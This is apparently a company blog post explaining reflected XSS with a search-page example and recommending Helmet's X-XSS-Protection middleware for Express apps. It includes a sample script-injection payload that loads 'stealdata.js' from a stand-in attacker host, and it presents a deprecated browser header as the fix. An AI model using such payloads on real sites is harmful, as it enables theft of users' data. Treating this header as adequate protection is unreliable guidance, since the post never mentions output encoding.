A solution to JS Injection

What is JS injection and how to block it?

JS Injection

JavaScript is one of the most popular technologies and is being widely used for web pages and web applications. It enables developers to build different website functionalities quickly and nicely. However, this technology brings some security issues which, being the developer or tester, you ought to be aware of.
Like two sides of the same coin, some people use JavaScript for wrong purposes. One such is JavaScript Injection. The purpose of JS Injection is to inject JavaScript code, that runs from the client-side.

Risks of JavaScript Injection

JS Injection offers many possibilities for a hacker to gain control over users’ information and change, as well as restrict or block operations and manipulate parameters (for example cookies). Therefore, this can lead to some serious damages, information leakage and even hacking.

The Attack

JS injection type of attacks - XSS attack

Cross-Site Scripting (XSS) attacks are a type of injection (JS injection). This attack basically injects malicious scripts into applications or websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to an end user.

XSS cannot be explained in detail here. However, the main takeaway is if someone can run JavaScript on your page, your users are vulnerable for attack. This post gives you a solution to this problem.

One kind of XSS is called “Reflected XSS”. It works by setting a query string which is placed directly into the HTML. Placing JavaScript in the query string can let an attacker execute their JavaScript just by passing a malicious query string.

Say, when running an application that has search options, every time you search, it displays your search results. For example, let’s say you’ve searched for ‘nodeJS’.

When you do a search, your search terms also appear in your query string. The full URL might look something like this:

https://example.com/search?query=nodeJS

The search results might look like the screenshot below. Notice how the text appears right on the page:

 

What if we could search for something like

<script src="http://evil.com/stealdata.js"></script>?

That URL  appears as below:

https://example.com/search?query=<script%20src="http://example.com/stealdata.js"></script>

And here’s how it would appear on your page:

Suddenly, a malicious JavaScript file was executed just because you visited a URL! That’s not good.

Averting the attack

Helmet’s XSS filter is a relatively simple middleware that will set the X-XSS-Protectionheader. On most browsers, it will set it to 1; mode=block. On old Internet Explorer versions, it will set it to 0 to disable it.

You can use this module as part of the Helmet:

// Make sure you run "npm install helmet" to get the Helmet package.
var helmet = require('helmet') 

// Sets "X-XSS-Protection: 1; mode=block".
app.use(helmet.xssFilter())

You can also use it as a standalone module:

// Make sure you run "npm install x-xss-protection" to get this package.
var xssFilter = require('x-xss-protection') 

// Sets "X-XSS-Protection: 1; mode=block".
app.use(xssFilter())

To force the header to be set to 1; mode=block on all versions of IE, add the option:

app.use(xssFilter({ setOnOldIE: true }))
// This has some security problems for old IE!

You can also optionally configure a report URI, though the flag is specific to Chrome-based browsers. This option will report the violation to the specified URI:

app.use(xssFilter({ reportUri: '/report-xss-violation' }))

This header is included in the default Helmet bundle.

For reference refer npm helmet documentation.

This solution does help in protecting yourself from one type of JS Injection, thereby assuring protection of your website users and their data privacy.

Please share your comments below and follow this blog if you are interested in getting more information on JavaScript.

Software Engineer

No.52, 2nd Floor, Dr.Radhakrishnan Salai,
Mylapore – Chennai – 600 004.
(Opp to Chennai Citi center)
p.charantej@bestirtech.com
 Facebook Icon

Leave a Reply

Your email address will not be published. Required fields are marked *